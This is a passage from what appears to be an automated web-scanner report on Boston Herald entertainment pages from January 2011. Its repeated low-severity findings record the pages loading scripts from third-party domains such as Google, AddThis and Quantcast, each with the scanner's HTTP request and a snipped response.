Path:   /track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:28:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 70938

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.760. http://www.bostonherald.com/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/srvc=home&position=3

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/srvc=home&position=3

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/srvc=home&position=3 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:27:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 48961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.761. http://www.bostonherald.com/track/inside_track/view/20110128tracked_down_deion_branch_jarvis_green_kevin_faulk_and_more_1/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110128tracked_down_deion_branch_jarvis_green_kevin_faulk_and_more_1/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/inside_track/view/20110128tracked_down_deion_branch_jarvis_green_kevin_faulk_and_more_1/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:29:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 44345

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.762. http://www.bostonherald.com/track/inside_track/view/20110128we_hear_mitt_romney_david_letterman_andrew_weisblum_and_more/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/inside_track/view/20110128we_hear_mitt_romney_david_letterman_andrew_weisblum_and_more/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/inside_track/view/20110128we_hear_mitt_romney_david_letterman_andrew_weisblum_and_more/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:30:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 42939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.763. http://www.bostonherald.com/track/star_tracks/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/star_tracks/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/star_tracks/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:42:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 52695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.764. http://www.bostonherald.com/track/star_tracks/view.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/star_tracks/view.bg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/star_tracks/view.bg?articleid=1312558 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:42:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39136

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.765. http://www.bostonherald.com/track/star_tracks/view/20110127bristol_palin_sought_as_sexual_responsibility_expert/srvc=track&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/star_tracks/view/20110127bristol_palin_sought_as_sexual_responsibility_expert/srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/star_tracks/view/20110127bristol_palin_sought_as_sexual_responsibility_expert/srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:41:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 42081

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.766. http://www.bostonherald.com/track/star_tracks/view/20110128donald_sutherland_gets_a_star_on_the_hollywood_walk_of_fame/srvc=track&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/star_tracks/view/20110128donald_sutherland_gets_a_star_on_the_hollywood_walk_of_fame/srvc=track&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/star_tracks/view/20110128donald_sutherland_gets_a_star_on_the_hollywood_walk_of_fame/srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:39:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-language: en
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.767. http://www.bostonherald.com/track/star_tracks/view/20110128donald_sutherland_gets_a_star_on_the_hollywood_walk_of_fame/srvc=track&position=recent_bullet

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /track/star_tracks/view/20110128donald_sutherland_gets_a_star_on_the_hollywood_walk_of_fame/srvc=track&position=recent_bullet

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /track/star_tracks/view/20110128donald_sutherland_gets_a_star_on_the_hollywood_walk_of_fame/srvc=track&position=recent_bullet HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
